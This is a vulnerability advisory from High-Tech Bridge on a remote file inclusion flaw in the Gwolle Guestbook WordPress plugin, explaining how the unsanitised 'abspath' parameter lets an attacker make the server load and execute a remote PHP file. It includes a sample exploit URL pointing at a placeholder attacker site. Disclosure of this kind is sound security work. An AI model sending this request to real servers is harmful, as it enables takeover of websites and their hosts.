Lucene search

K
htbridgeHigh-Tech BridgeHTB23275
HistoryOct 14, 2015 - 12:00 a.m.

Remote File Inclusion in Gwolle Guestbook WordPress Plugin

2015-10-1400:00:00
High-Tech Bridge
www.htbridge.com
3374

EPSS

0.795

Percentile

98.3%

High-Tech Bridge Security Research Lab discovered a critical Remote File Inclusion (RFI) in Gwolle Guestbook WordPress plugin, which can be exploited by non-authenticated attacker to include remote PHP file and execute arbitrary code on the vulnerable system.

HTTP GET parameter “abspath” is not being properly sanitized before being used in PHP require() function. A remote attacker can include a file named ‘wp-load.php’ from arbitrary remote server and execute its content on the vulnerable web server. In order to do so the attacker needs to place a malicious ‘wp-load.php’ file into his server document root and includes server’s URL into request:

http://[host]/wp-content/plugins/gwolle-gb/frontend/captcha/ajaxresponse.php ?abspath=http://[hackers_website]

In order to exploit this vulnerability ‘allow_url_include’ shall be set to 1. Otherwise, attacker may still include local files and also execute arbitrary code.

Successful exploitation of this vulnerability will lead to entire WordPress installation compromise, and may even lead to the entire web server compromise.